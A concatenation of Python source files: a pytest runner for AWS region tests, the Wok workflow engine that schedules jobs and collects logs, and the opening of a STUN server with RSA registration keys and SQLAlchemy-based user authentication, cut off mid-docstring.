pytest_args.extend(["--custom-awsbatch-template-url", args.custom_awsbatch_template_url])
if args.custom_awsbatchcli_url:
pytest_args.extend(["--custom-awsbatchcli-package", args.custom_awsbatchcli_url])
if args.custom_ami:
pytest_args.extend(["--custom-ami", args.custom_ami])
def _set_custom_stack_args(args, pytest_args):
if args.vpc_stack:
pytest_args.extend(["--vpc-stack", args.vpc_stack])
if args.cluster:
pytest_args.extend(["--cluster", args.cluster])
if args.no_delete:
pytest_args.append("--no-delete")
def _get_pytest_regionalized_args(region, args):
return _get_pytest_args(
args=args,
regions=[region],
log_file="{0}/{1}.log".format(LOGS_DIR, region),
out_dir="{0}/{1}".format(OUT_DIR, region),
)
def _get_pytest_non_regionalized_args(args):
return _get_pytest_args(
args=args, regions=args.regions, log_file="{0}/all_regions.log".format(LOGS_DIR), out_dir=OUT_DIR
)
def _run_test_in_region(region, args):
out_dir = "{base_dir}/{out_dir}/{region}".format(base_dir=args.output_dir, out_dir=OUT_DIR, region=region)
os.makedirs(out_dir, exist_ok=True)
# Redirect stdout to file
if not args.show_output:
sys.stdout = open("{0}/pytest.out".format(out_dir), "w")
pytest_args_regionalized = _get_pytest_regionalized_args(region, args)
logger.info("Starting tests in region {0} with params {1}".format(region, pytest_args_regionalized))
pytest.main(pytest_args_regionalized)
def _make_logging_dirs(base_dir):
logs_dir = "{base_dir}/{logs_dir}".format(base_dir=base_dir, logs_dir=LOGS_DIR)
os.makedirs(logs_dir, exist_ok=True)
logger.info("Configured logs dir: {0}".format(logs_dir))
out_dir = "{base_dir}/{out_dir}".format(base_dir=base_dir, out_dir=OUT_DIR)
os.makedirs(out_dir, exist_ok=True)
logger.info("Configured tests output dir: {0}".format(out_dir))
def _run_parallel(args):
jobs = []
for region in args.regions:
p = multiprocessing.Process(target=_run_test_in_region, args=[region, args])
jobs.append(p)
p.start()
for job in jobs:
job.join()
def _run_sequential(args):
# Redirect stdout to file
if not args.show_output:
sys.stdout = open("{0}/{1}/pytest.out".format(args.output_dir, OUT_DIR), "w")
pytest_args_non_regionalized = _get_pytest_non_regionalized_args(args)
logger.info("Starting tests with params {0}".format(pytest_args_non_regionalized))
pytest.main(pytest_args_non_regionalized)
def main():
"""Entrypoint for tests executor."""
args = _init_argparser().parse_args()
logger.info("Starting tests with parameters {0}".format(args))
_make_logging_dirs(args.output_dir)
if args.sequential:
_run_sequential(args)
else:
_run_parallel(args)
logger.info("All tests completed!")
reports_output_dir = "{base_dir}/{out_dir}".format(base_dir=args.output_dir, out_dir=OUT_DIR)
if "junitxml" in args.reports:
generate_junitxml_merged_report(reports_output_dir)
if "json" in args.reports:
logger.info("Generating tests report")
generate_json_report(reports_output_dir)
if __name__ == "__main__":
main()
|
engine.py
|
###############################################################################
#
# Copyright 2009-2011, Universitat Pompeu Fabra
#
# This file is part of Wok.
#
# Wok is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Wok is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses
#
###############################################################################
import os
import shutil
import StringIO
import time
from Queue import Queue, Empty
import threading
from multiprocessing import cpu_count
from sqlalchemy import func
from sqlalchemy.orm.exc import NoResultFound
from blinker import Signal
from wok import logger
from wok.config.data import Data
from wok.config.loader import ConfigLoader
from wok.core import runstates
from wok.core import events
from wok.core import errors
from wok.core.utils.sync import Synchronizable, synchronized
from wok.core.utils.atomic import AtomicCounter
from wok.core.utils.logsdb import LogsDb
from wok.core.utils.proctitle import set_thread_title
from wok.engine.projects import ProjectManager
from wok.platform.factory import create_platform
from wok.core.cmd import create_command_builder
from wok.jobs import JobSubmission
import db
from case import Case, SynchronizedCase
_DT_FORMAT = "%Y-%m-%d %H:%M:%S"
class WokEngine(Synchronizable):
"""
The Wok engine manages the execution of workflow cases.
Each case represents a workflow loaded with a certain configuration.
"""
def __init__(self, conf, conf_base_path=None):
Synchronizable.__init__(self)
self._global_conf = conf
self._expanded_global_conf = conf.clone().expand_vars()
self._conf = self._expanded_global_conf.get("wok", default=Data.element)
self._conf_base_path = conf_base_path
self._log = logger.get_logger("wok.engine")
self._work_path = self._conf.get("work_path", os.path.join(os.getcwd(), "wok-files"))
if not os.path.exists(self._work_path):
os.makedirs(self._work_path)
self._cases = []
self._cases_by_name = {}
self._stopping_cases = {}
#self._lock = Lock()
self._cvar = threading.Condition(self._lock)
self._run_thread = None
self._running = False
self._finished_event = threading.Event()
self._job_task_map = {}
self._logs_threads = []
self._logs_queue = Queue()
self._join_thread = None
self._join_queue = Queue()
self._num_log_threads = self._conf.get("num_log_threads", cpu_count())
self._max_alive_threads = 2 + self._num_log_threads
self._num_alive_threads = AtomicCounter()
self._started = False
self._notified = False
recover = self._conf.get("recover", False)
db_path = os.path.join(self._work_path, "engine.db")
if not recover and os.path.exists(db_path):
os.remove(db_path)
self._db = db.create_engine("sqlite:///{}".format(db_path), drop_tables=not recover)
# platforms
self._platforms = self._create_platforms()
self._platforms_by_name = {}
for platform in self._platforms:
self._platforms_by_name[platform.name] = platform
default_platform_name = self._conf.get("default_platform", self._platforms[0].name)
if default_platform_name not in self._platforms_by_name:
self._log.warn("Platform '{}' not found, using '{}' as the default platform".format(
default_platform_name, self._platforms[0].name))
default_platform_name = self._platforms[0].name
self._default_platform = self._platforms_by_name[default_platform_name]
# projects
if conf_base_path is None:
conf_base_path = os.getcwd()
projects_conf = self._global_conf.get("wok.projects")
self._projects = ProjectManager(projects_conf, base_path=conf_base_path)
self._projects.initialize()
# signals
self.case_created = Signal()
self.case_state_changed = Signal()
self.case_started = Signal()
self.case_finished = Signal()
self.case_removed = Signal()
# recovering
if recover:
self.__recover_from_db()
def _create_platforms(self):
"""
Creates the platform according to the configuration
:return: Platform
"""
platform_confs = self._conf.get("platforms")
if platform_confs is None:
platform_confs = Data.list()
elif not Data.is_list(platform_confs):
self._log.error("Wrong configuration type for 'platforms': {}".format(platform_confs))
platform_confs = Data.list()
if len(platform_confs) == 0:
platform_confs += [Data.element(dict(type="local"))]
platforms = []
names = {}
for pidx, platform_conf in enumerate(platform_confs):
if isinstance(platform_conf, basestring):
if not os.path.isabs(platform_conf) and self._conf_base_path is not None:
platform_conf = os.path.join(self._conf_base_path, platform_conf)
platform_conf = ConfigLoader(platform_conf).load()
if not Data.is_element(platform_conf):
raise errors.ConfigTypeError("wok.platforms[{}]".format(pidx, platform_conf))
ptype = platform_conf.get("type", "local")
name = platform_conf.get("name", ptype)
if name in names:
name = "{}-{}".format(name, names[name])
names[name] += 1
else:
names[name] = 2
platform_conf["name"] = name
if "work_path" not in platform_conf:
platform_conf["work_path"] = os.path.join(self._work_path, "platform_{}".format(name))
self._log.info("Creating '{}' platform ...".format(name))
self._log.debug("Platform configuration: {}".format(repr(platform_conf)))
platforms += [create_platform(ptype, platform_conf)]
return platforms
def _on_job_update(self, event, **kwargs):
self.notify()
def __recover_from_db(self):
raise NotImplementedError()
def __queue_adaptative_get(self, queue, start_timeout=1.0, max_timeout=6.0):
timeout = start_timeout
msg = None
while self._running and msg is None:
try:
msg = queue.get(timeout=timeout)
except Empty:
if timeout < max_timeout:
timeout += 0.5
except:
break
return msg
# Not used anywhere
def __queue_batch_get(self, queue, start_timeout=1, max_timeout=5):
timeout = start_timeout
msg_batch = []
while self._running and len(msg_batch) == 0:
try:
msg_batch += [queue.get(timeout=timeout)]
while not queue.empty():
msg_batch += [queue.get(timeout=timeout)]
except Empty:
if timeout < max_timeout:
timeout += 1
return msg_batch
def __job_submissions(self, session, platform):
#FIXME Be fair with priorities between different cases ?
query = session.query(db.WorkItem)\
.filter(db.WorkItem.state == runstates.READY)\
.filter(db.WorkItem.platform == platform.name)\
.order_by(db.WorkItem.priority)
for workitem in query:
case = self._cases_by_name[workitem.case.name]
task = case.component(workitem.task.cname)
js = JobSubmission(
case=case,
task=task,
workitem_id=workitem.id,
job_name=workitem.cname,
task_conf=task.conf,
priority=workitem.priority)
execution = task.execution
cmd_builder = create_command_builder(execution.mode)
js.script, js.env = cmd_builder.prepare(case, task, workitem.index)
yield js
def __remove_case(self, session, case):
"""
Definitively remove a case. The engine should be locked and no case jobs running.
"""
self._log.info("Dropping case {} ...".format(case.name))
del self._cases_by_name[case.name]
self._cases.remove(case)
# remove engine db objects and finalize case
self._log.debug(" * database ...")
case.remove(session)
self._lock.release()
try:
#TODO clean the job manager output files
try:
self._log.debug(" * logs ...")
logs_path = os.path.join(self._work_path, "logs", case.name)
shutil.rmtree(logs_path)
except:
self._log.exception("Error removing logs at {}".format(logs_path))
# remove data
self._log.debug(" * data ...")
for platform in case.platforms:
platform.data.remove_case(case.name)
# remove storage
self._log.debug(" * storage ...")
for platform in case.platforms:
platform.storage.delete_container(case.name)
# emit signal
self.case_removed.send(case)
finally:
self._lock.acquire()
# threads ----------------------
@synchronized
def _run(self):
set_thread_title()
num_exc = 0
self._running = True
self._num_alive_threads += 1
# Start the logs threads
for i in range(self._num_log_threads):
t = threading.Thread(target=self._logs, args=(i, ), name="wok-engine-logs-%d" % i)
self._logs_threads += [t]
t.start()
# Start the join thread
self._join_thread = threading.Thread(target=self._join, name="wok-engine-join")
self._join_thread.start()
_log = logger.get_logger("wok.engine.run")
_log.debug("Engine run thread ready")
while self._running:
session = db.Session()
try:
#_log.debug("Scheduling new tasks ...")
set_thread_title("scheduling")
updated_tasks = set()
# schedule tasks ready to be executed and save new workitems into the db
for case in self._cases:
tasks = case.schedule(session)
updated_tasks.update(tasks)
session.commit()
# submit workitems ready to be executed
for platform in self._platforms:
job_submissions = self.__job_submissions(session, platform)
for js, job_id, job_state in platform.submit(job_submissions):
workitem = session.query(db.WorkItem).filter(db.WorkItem.id == js.workitem_id).one()
workitem.job_id = job_id
workitem.state = job_state
js.task.dirty = True
session.commit()
updated_tasks.add(js.task)
session.close()
session = None
#_log.debug("Waiting for events ...")
set_thread_title("waiting")
while len(updated_tasks) == 0 and not self._notified and self._running:
self._cvar.wait(1)
self._notified = False
if not self._running:
break
session = db.Session() # there is a session.close() in the finished block
#_log.debug("Stopping jobs for aborting instances ...")
set_thread_title("working")
# check stopping instances
for case in self._cases:
if (case.state == runstates.ABORTING or case.removed) and case not in self._stopping_cases:
num_job_ids = session.query(db.WorkItem.job_id).filter(db.WorkItem.case_id == case.id)\
.filter(~db.WorkItem.state.in_(runstates.TERMINAL_STATES)).count()
if num_job_ids == 0:
if case.state == runstates.ABORTING:
_log.debug("Aborted case {} with no running jobs".format(case.name))
dbcase = session.query(db.Case).filter(db.Case.id == case.id)
dbcase.state = case.state = runstates.ABORTED
session.commit()
else:
_log.debug("Stopped case {} with no running jobs".format(case.name))
if case.removed:
_log.debug("Removing case {} with no running jobs".format(case.name))
self.__remove_case(session, case)
session.commit()
else:
_log.info("Stopping {} jobs for case {} ...".format(num_job_ids, case.name))
self._stopping_cases[case] = set()
for platform in self._platforms:
job_ids = [int(r[0]) for r in session.query(db.WorkItem.job_id)
.filter(db.WorkItem.case_id == case.id)\
.filter(db.WorkItem.platform == platform.name)\
.filter(~db.WorkItem.state.in_(runstates.TERMINAL_STATES))]
self._stopping_cases[case].update(job_ids)
platform.jobs.abort(job_ids)
#_log.debug("Checking job state changes ...")
# detect workitems which state has changed
for platform in self._platforms:
for job_id, state in platform.jobs.state():
try:
workitem = session.query(db.WorkItem).filter(db.WorkItem.job_id == job_id).one()
except NoResultFound:
_log.warn("No work-item available for the job {0} while retrieving state".format(job_id))
platform.jobs.abort([job_id])
platform.jobs.join(job_id)
continue
if workitem.state != state:
case = self._cases_by_name[workitem.case.name]
task = case.component(workitem.task.cname)
task.dirty = True
workitem.state = state
workitem.substate = runstates.LOGS_RETRIEVAL
session.commit()
updated_tasks.add(task)
# if workitem has finished, queue it for logs retrieval
if state in runstates.TERMINAL_STATES:
self._logs_queue.put((workitem.id, job_id))
_log.debug("[{}] Work-Item {} changed state to {}".format(case.name, workitem.cname, state))
#_log.debug("Updating components state ...")
# update affected components state
updated_cases = set([task.case for task in updated_tasks])
for case in updated_cases:
case.update_states(session)
case.update_count_by_state(session)
case.clean_components(session)
session.commit()
if case.state == runstates.RUNNING:
self._lock.release()
try:
self.case_started.send(case)
finally:
self._lock.acquire()
for task in updated_tasks:
case = task.case
#_log.debug("[{}] Component {} updated state to {} ...".format(
# component.case.name, component.cname, component.state))
count = task.workitem_count_by_state
sb = ["[{}] {} ({})".format(case.name, task.cname, task.state.title)]
sep = " "
for state in runstates.STATES:
if state in count:
sb += [sep, "{}={}".format(state.symbol, count[state])]
if sep == " ":
sep = ", "
if task.state == runstates.FINISHED and task.state in count:
elapsed = str(task.elapsed)
elapsed = elapsed.split(".")[0]
sb += [" ", "<{}>".format(elapsed)]
self._log.info("".join(sb))
except BaseException as ex:
num_exc += 1
_log.warn("Exception in run thread ({}): {}".format(num_exc, str(ex)))
#if num_exc > 3:
# raise
#else:
from traceback import format_exc
_log.debug(format_exc())
try:
if session is not None:
session.rollback()
except Exception as ex:
_log.warn("Session rollback failed")
_log.exception(ex)
finally:
try:
if session is not None:
session.close()
except Exception as ex:
_log.warn("Session close failed")
_log.exception(ex)
session = None
set_thread_title("finishing")
try:
# print cases state before leaving the thread
#for case in self._cases:
# _log.debug("Case state:\n" + repr(case))
for t in self._logs_threads:
t.join()
self._lock.release()
self._join_thread.join()
self._lock.acquire()
_log.debug("Engine run thread finished")
except Exception as ex:
_log.exception(ex)
self._running = False
self._num_alive_threads -= 1
def _logs(self, index):
"Log retrieval thread"
set_thread_title()
self._num_alive_threads += 1
_log = logger.get_logger("wok.engine.logs-{}".format(index))
_log.debug("Engine logs thread ready")
num_exc = 0
while self._running:
set_thread_title("waiting")
# get the next task to retrieve the logs
job_info = self.__queue_adaptative_get(self._logs_queue)
if job_info is None:
continue
workitem_id, job_id = job_info
session = db.Session()
task = None
try:
workitem = session.query(db.WorkItem).filter(db.WorkItem.id == workitem_id).one()
case = self._cases_by_name[workitem.case.name]
task = case.component(workitem.task.cname)
set_thread_title(workitem.cname)
_log.debug("[{}] Reading logs for work-item {} ...".format(case.name, workitem.cname))
output = task.platform.jobs.output(job_id)
if output is None:
output = StringIO.StringIO()
path = os.path.join(self._work_path, "logs", case.name, task.cname)
if not os.path.isdir(path):
try:
os.makedirs(path)
except:
if not os.path.isdir(path):
raise
path = os.path.join(path, "{:08}.db".format(workitem.index))
if os.path.isfile(path):
os.remove(path)
logs_db = LogsDb(path)
logs_db.open()
logs_db.add(case.name, task.cname, workitem.index, output)
logs_db.close()
_log.debug("[{}] Done with logs of work-item {}".format(case.name, workitem.cname))
except BaseException as ex:
num_exc += 1
session.rollback()
_log.info("Exception in logs thread ({}): {}".format(num_exc, str(ex)))
from traceback import format_exc
_log.debug(format_exc())
finally:
workitem.substate = runstates.JOINING
self._join_queue.put(job_info)
session.commit()
session.close()
self._num_alive_threads -= 1
_log.debug("Engine logs thread finished")
def _join(self):
"Joiner thread"
set_thread_title()
self._num_alive_threads += 1
_log = logger.get_logger("wok.engine.join")
_log.debug("Engine join thread ready")
session = None
num_exc = 0
while self._running:
try:
set_thread_title("waiting")
job_info = self.__queue_adaptative_get(self._join_queue)
if job_info is None:
continue
workitem_id, job_id = job_info
with self._lock:
session = db.Session()
workitem = session.query(db.WorkItem).filter(db.WorkItem.id == workitem_id).one()
case = self._cases_by_name[workitem.case.name]
task = case.component(workitem.task.cname)
set_thread_title(task.cname)
#_log.debug("Joining work-item %s ..." % task.cname)
jr = task.platform.jobs.join(job_id)
wr = Data.element(dict(
hostname=jr.hostname,
created=jr.created.strftime(_DT_FORMAT) if jr.created is not None else None,
started=jr.started.strftime(_DT_FORMAT) if jr.started is not None else None,
finished=jr.finished.strftime(_DT_FORMAT) if jr.finished is not None else None,
exitcode=jr.exitcode.code if jr.exitcode is not None else None))
r = task.platform.data.load_workitem_result(case.name, task.cname, workitem.index)
if r is not None:
if r.exception is not None:
wr["exception"] = r.exception
if r.trace is not None:
wr["trace"] = r.trace
workitem.substate = None
workitem.result = wr
case.num_active_workitems -= 1
session.commit()
# check if there are still more work-items
num_workitems = session.query(func.count(db.WorkItem.id)).filter(
~db.WorkItem.state.in_(runstates.TERMINAL_STATES)).scalar()
if self._single_run and num_workitems == 0:
stop_engine = True
for case in self._cases:
stop_engine = stop_engine and (case.state in runstates.TERMINAL_STATES)
#self._running = not stop_engine
if stop_engine:
self._finished_event.set()
_log.debug("[{}] Joined work-item {}".format(case.name, workitem.cname))
# check stopping instances
if case in self._stopping_cases:
job_ids = self._stopping_cases[case]
if job_id in job_ids:
job_ids.remove(job_id)
if len(job_ids) == 0:
del self._stopping_cases[case]
if case.state == runstates.ABORTING:
workitem.case.state = case.state = runstates.ABORTED
session.commit()
if case.removed:
self.__remove_case(session, case)
session.commit()
else:
_log.debug("Still waiting for {} jobs to stop".format(len(job_ids)))
if case.state in runstates.TERMINAL_STATES and case.num_active_workitems == 0:
_log.info("[{}] Case {}. Total time: {}".format(case.name, case.state.title, str(case.elapsed)))
self._lock.release()
try:
self.case_finished.send(case)
finally:
self._lock.acquire()
except BaseException as ex:
num_exc += 1
_log.warn("Exception in join thread ({}): {}".format(num_exc, str(ex)))
from traceback import format_exc
_log.debug(format_exc())
try:
if session is not None:
session.rollback()
except Exception as ex:
_log.warn("Session rollback failed")
_log.exception(ex)
finally:
try:
if session is not None:
session.close()
except Exception as ex:
_log.warn("Session close failed")
_log.exception(ex)
self._num_alive_threads -= 1
_log.debug("Engine join thread finished")
# API -----------------------------------
@property
def conf(self):
return self._conf
@property
def work_path(self):
return self._work_path
@property
def projects(self):
return self._projects
def platform(self, name):
return self._platforms_by_name.get(name)
@property
def default_platform(self):
return self._default_platform
@synchronized
def start(self, wait=True, single_run=False):
self._log.info("Starting engine ...")
started_platforms = []
try:
for platform in self._platforms:
started_platforms += [platform]
platform.start()
platform.callbacks.add(events.JOB_UPDATE, self._on_job_update)
except BaseException as ex:
self._log.error(str(ex))
for platform in started_platforms:
platform.close()
raise
#for project in self._projects:
# self._default_platform.sync_project(project)
self._single_run = single_run
self._run_thread = threading.Thread(target=self._run, name="wok-engine-run")
self._run_thread.start()
self._lock.release()
try:
try:
self._num_alive_threads.wait_condition(lambda value: value < self._max_alive_threads)
self._started = True
self._log.info("Engine started")
except KeyboardInterrupt:
wait = False
self._log.warn("Ctrl-C pressed ...")
except Exception as e:
wait = False
self._log.error("Exception while waiting for the engine to start")
self._log.exception(e)
if wait:
self.wait()
finally:
self._lock.acquire()
def wait(self):
self._log.info("Waiting for the engine to finish ...")
try:
finished = self._finished_event.wait(1)
while not finished:
finished = self._finished_event.wait(1)
except KeyboardInterrupt:
self._log.warn("Ctrl-C pressed ...")
except Exception as e:
self._log.error("Exception while waiting for the engine to finish, stopping the engine ...")
self._log.exception(e)
self._log.info("Finished waiting for the engine ...")
def _stop_threads(self):
self._log.info("Stopping threads ...")
if self._run_thread is not None:
with self._lock:
self._running = False
self._cvar.notify()
while self._run_thread.isAlive():
try:
self._run_thread.join(1)
except KeyboardInterrupt:
self._log.warn("Ctrl-C pressed, killing the process ...")
import signal
os.kill(os.getpid(), signal.SIGTERM)
except Exception as e:
self._log.error("Exception while waiting for threads to finish ...")
self._log.exception(e)
self._log.warn("killing the process ...")
exit(-1)
import signal
os.kill(os.getpid(), signal.SIGTERM)
self._run_thread = None
self._log.info("All threads finished ...")
@synchronized
def stop(self):
self._log.info("Stopping the engine ...")
self._finished_event.set()
self._lock.release()
try:
if self._run_thread is not None:
self._stop_threads()
for platform in self._platforms:
platform.close()
finally:
self._lock.acquire()
self._started = False
self._log.info("Engine stopped")
def running(self):
return self._started
def notify(self, lock=True):
if lock:
self._lock.acquire()
self._notified = True
self._cvar.notify()
if lock:
self._lock.release()
@synchronized
def cases(self):
instances = []
for inst in self._cases:
instances += [SynchronizedCase(self, inst)]
return instances
@synchronized
def case(self, name):
inst = self._cases_by_name.get(name)
if inst is None:
return None
return SynchronizedCase(self, inst)
@synchronized
def exists_case(self, name):
return name in self._cases_by_name
@synchronized
def create_case(self, case_name, conf_builder, project_name, flow_name, container_name):
"Creates a new workflow case"
session = db.Session()
if session.query(db.Case).filter(db.Case.name==case_name).count() > 0:
raise Exception("A case with this name already exists: {}".format(case_name))
flow_uri = "{}:{}".format(project_name, flow_name)
self._log.info("Creating case {} from {} ...".format(case_name, flow_uri))
try:
try:
flow = self.projects.load_flow(flow_uri)
project = flow.project
except:
self._log.error("Error while loading the workflow from {}".format(flow_uri))
raise
for platform in self._platforms:
try:
platform.data.remove_case(case_name)
platform.data.create_case(case_name)
except:
self._log.error("Error while initializing data for case {}".format(case_name))
raise
try:
case = Case(case_name, conf_builder, project, flow, container_name, engine=self)
self._cases += [case]
self._cases_by_name[case_name] = case
case.persist(session)
session.flush()
self.notify(lock=False)
except:
self._log.error("Error while creating case {} for the workflow {} with configuration {}".format(
case_name, flow_uri, conf_builder.get_conf()))
raise
except:
session.rollback()
#self._log.error("Error while creating case {} for the workflow {} with configuration {}".format(
# case_name, flow_uri, conf_builder.get_conf()))
raise
session.close()
self._log.debug("\n" + repr(case))
self._lock.release()
try:
self.case_created.send(case)
finally:
self._lock.acquire()
return SynchronizedCase(self, case)
@synchronized
def remove_case(self, name):
if name in self._cases_by_name:
session = db.Session()
case = self._cases_by_name[name]
dbcase = session.query(db.Case).filter(db.Case.id == case.id).first()
dbcase.removed = case.removed = True
if case.state not in runstates.TERMINAL_STATES + [runstates.READY]:
dbcase.state = case.state = runstates.ABORTING
num_retries = 3
while num_retries > 0:
try:
session.commit()
self.notify(lock=False)
self._log.debug("Case {} marked for removal".format(case.name))
except BaseException as ex:
num_retries -= 1
_log.info("Exception in remove_case: {}".format(str(ex)))
if num_retries > 0:
_log.info("Remaining retries = {}".format(num_retries))
import time
time.sleep(1)
else:
from traceback import format_exc
_log.debug(format_exc())
session.rollback()
finally:
session.close()
else:
self._log.error("Trying to remove a non existing case: {}".format(name))
'''
try:
# retrieve job id's
session = db.Session()
job_ids = session.query(db.WorkItem.job_id)\
.filter(db.WorkItem.case_id == self.id)\
.filter(db.WorkItem.job_id != None).all()
# abort running jobs
case.platform.jobs.abort(job_ids)
except:
self._log.error("Remove case {}: Error aborting jobs.".format(name))
#TODO we need to know when the jobs finish to clean the engine log dbs and the job manager output files
try:
# remove data
case.platform.data.remove_case(case.name)
except:
self._log.error("Remove case {}: Error removing data.".format(name))
# remove engine db objects and finalize case
#case.remove(session)
#TODO we need to know when the jobs finish to clean the engine db objects and finalize the case
session.close()
'''
|
stun_server.py
|
import socket
import sys
import os
import traceback
import struct
import threading
from threading import Thread
import time
from datetime import date, timedelta
import datetime
import json
import buffered_message
import psycopg2
from connection_state import ConnectionState
import tcp
import sqlalchemy
from sqlalchemy import func
import stun_alchemy
from stun_alchemy import Stun_User
from Crypto.PublicKey import RSA
from Crypto import Random
import re
orig_path = os.getcwd()
os.chdir("../")
sys.path.insert(0, os.getcwd())
os.chdir(orig_path)
from auth import auth
import hashlib
# *************
# EXAMPLE USAGE
# *************
"""
import os
import socket
import tcp
import udp
import stun_server
import yaml
def x(data):
print yaml.dump({"data":data}, default_flow_style=False)
start_listening = True
buffer_size = 1024
local_ip = socket.gethostbyname(socket.gethostname())
local_port = 30788
database_config_file = "%s/database_conf.json" % os.path.dirname(os.path.realpath("database_conf.json")) # "%s/database_conf.json" % os.path.dirname(os.path.realpath(__file__))
server = stun_server.STUN_Server(start_listening, buffer_size, local_ip, local_port, database_config_file)
if __name__ == "__main__":
# Keep this process running until Enter is pressed
print "Press Enter to quit..."
try:
sys.stdin.readline()
except:
pass
server.shutdown()
"""
# pk.exportkey("OpenSSH")
# comm = udp.UDP_Communications(True)
# comm.send_message([5,6,7], True)
# comm.pop_message(True)
class STUN_Server:
def __init__(self,
start_listen_thread=False,
buffer_size=1024,
local_ip=socket.gethostbyname(socket.gethostname()),
local_port=30788,
database_config_file=None):
self.local_ip = local_ip
self.local_port = local_port
self.buffer_size = buffer_size
self.database_config_file = database_config_file
self.thread_sleep_duration = 0.1
self.metainfo_update_thread_sleep_duration = 0.5
self.peer_timeout = 20 # measured in seconds
self.peer_map = {}
self.error_log = []
self.master_log = [] # all messages recieved
self.message_log_map = {} # log per message type.
self.key_map = {} # RSA key map for peers attempting registration.
self.connection_state = ConnectionState(False)
if start_listen_thread:
self.activate()
def log_error(self, error_message, extra=None):
err_msg = "[STUN_Server] Line #%s: %s\n\n%s" % (str(traceback.tb_lineno(sys.exc_traceback)), traceback.format_exc(), sys.exc_info())
timestamp = time.time()
date_string = datetime.datetime.fromtimestamp(timestamp).strftime('(%Y-%m-%d) %H:%M:%S')
self.error_log.append((timestamp, date_string, err_msg, extra))
def shutdown(self):
self.connection_state.active = False
self.tcp_server.disconnect()
def restart(self):
self.shutdown()
self.activate()
def activate(self, local_ip=None, local_port=None, buffer_size=None):
self.local_ip = local_ip if local_ip != None else self.local_ip
self.local_port = local_port if local_port != None else self.local_port
self.buffer_size = buffer_size if buffer_size != None else self.buffer_size
self.connection_state.active = False
self.connection_state = ConnectionState(True)
if(self.database_config_file == None):
# attempt to get the current directory path (networking module) and assume a database_conf.json is there.
self.database_config_file = "%s/database_conf.json" % os.path.dirname(os.path.realpath(__file__))
self.load_database_settings()
#self.init_database() # legacy direct sql connection init method. Replaced with SqlAlchemy ORM.
self.init_tcp_server(self.local_ip, self.local_port, self.buffer_size)
Thread(target=self.meta_watch).start()
Thread(target=self.main_listen_loop).start()
def load_database_settings(self):
contents = ""
f = open(self.database_config_file, "r+")
contents = f.read()
f.close()
db_config_map = json.loads(contents)
self.hostname = db_config_map["hostname"]
self.db_username = db_config_map["username"]
self.db_password = db_config_map["password"]
self.db_name = db_config_map["database"]
def init_database(self):
try:
if(self.hasattr("db_connection")):
self.db_connection.close()
except:
pass;
#connection_string = "dbname=%s user=%s password=%s host=%s" % (self.db_name, self.db_username, self.db_password, self.hostname);
#self.db_connection = psycopg2.connect(connection_string); # cursors are not thread-safe, so create them separately for each thread.
def init_tcp_server(self, local_ip=socket.gethostbyname(socket.gethostname()), local_port=30788, buffer_size=1024):
self.local_ip = local_ip;
self.local_port = local_port;
self.buffer_size = buffer_size;
self.tcp_server = tcp.TCP_Server(self.local_ip, self.local_port, self.buffer_size);
def get_active_peer_map(self):
session = stun_alchemy.Session();
active_time = datetime.datetime.utcnow() - timedelta(seconds=self.peer_timeout); # <peer_timeout> seconds into the past.
results = [];
try:
resultset = session.query(Stun_User).\
filter(Stun_User.last_active >= active_time).\
filter(Stun_User.logged_in == True).\
order_by(Stun_User.username).\
all();
for user in resultset:
results.append([user.username, user.profile_map]);
except:
results = [];
session.close();
return results;
def generate_rsa_keys(self):
random_generator = Random.new().read
key = RSA.generate(1024, random_generator)
return key;
def generate_registration_key(self, ip_address, port, username):
key = self.generate_rsa_keys();
client_key = "%s_%s_%s" % (ip_address, port, username);
self.key_map[client_key] = key;
public_key = key.publickey();
public_key_string = public_key.exportKey("OpenSSH");
response = "registration_key %s" % public_key_string;
recipients = [(ip_address, port),];
self.tcp_server.send_message(response, recipients);
def get_salt_and_key(self, username, ip_address, port):
result = None;
session = stun_alchemy.Session();
resultset = session.query(Stun_User).filter(Stun_User.username == username).all();
self.resultset = [resultset, username, ip_address, port]
if len(resultset) < 1:
session.close();
return auth.create_fake_salt_and_key(username, "sda8901234lfk");
user = resultset[0];
dynamic_key = auth.get_dynamic_key(stun_alchemy.Session, Stun_User, user, True); # force new key
salt = auth.extract_salt_from_key(user.salt_key);
result = [salt, dynamic_key];
user.auth_ip_address = ip_address;
user.auth_port = port;
session.commit();
session.close();
return result;
def authenticate_user(self, username, password, ip_address, port, login=True, available_ports=None, used_ports=None):
result = (False, None, "Invalid username/password.");
session = stun_alchemy.Session();
results = session.query(Stun_User).\
filter(Stun_User.username == username).\
filter(Stun_User.auth_ip_address == ip_address).\
filter(Stun_User.auth_port == port).\
all();
if len(results) < 1:
session.close();
return (False, None, "Invalid username/password.");
user = results[0];
result = auth.auth_password(stun_alchemy.Session, Stun_User, user, password, ip_address);
if result:
user.last_active = datetime.datetime.utcnow();
user.ip_address = ip_address;
user.port = port;
user.logged_in = login;
if available_ports != None:
user.available_ports = available_ports
if used_ports != None:
user.used_ports = used_ports
session.commit();
result = (True, user.profile_map, None);
session.close();
return result;
def is_authenticated(self, username, ip_address, port):
result = False;
time_out = datetime.datetime.utcnow() - timedelta(seconds = self.peer_timeout);
session = stun_alchemy.Session();
results = session.query(Stun_User).\
filter(Stun_User.username == username).\
filter(Stun_User.auth_ip_address == ip_address).\
filter(Stun_User.auth_port == port).\
filter(Stun_User.last_active >= time_out).\
filter(Stun_User.logged_in == True).\
all();
if len(results) < 1:
result = False;
else:
result = True;
session.close();
return result;
def user_is_active(self, username):
result = None;
time_out = datetime.datetime.utcnow() - timedelta(seconds = self.peer_timeout);
session = stun_alchemy.Session();
results = session.query(Stun_User).\
filter(Stun_User.username == username).\
filter(Stun_User.last_active >= time_out).\
filter(Stun_User.logged_in == True).\
all();
if len(results) < 1:
result = None;
else:
result = results[0];
session.close();
return result;
def check_login_status_of_all_users(self):
session = stun_alchemy.Session();
try:
resultset = session.query(Stun_User).\
filter(Stun_User.logged_in == True).\
order_by(Stun_User.username).\
all();
for user in resultset:
if not self.user_is_active(user.username):
user.logged_in = False;
session.commit();
except:
pass;
session.close();
def is_acceptable_password(self, password):
"""Returns True only if password length >= 8 and contains both letters and numbers
Note: special characters are allowed, but they are merely optional. They do not count towards the alphanumeric requirement."""
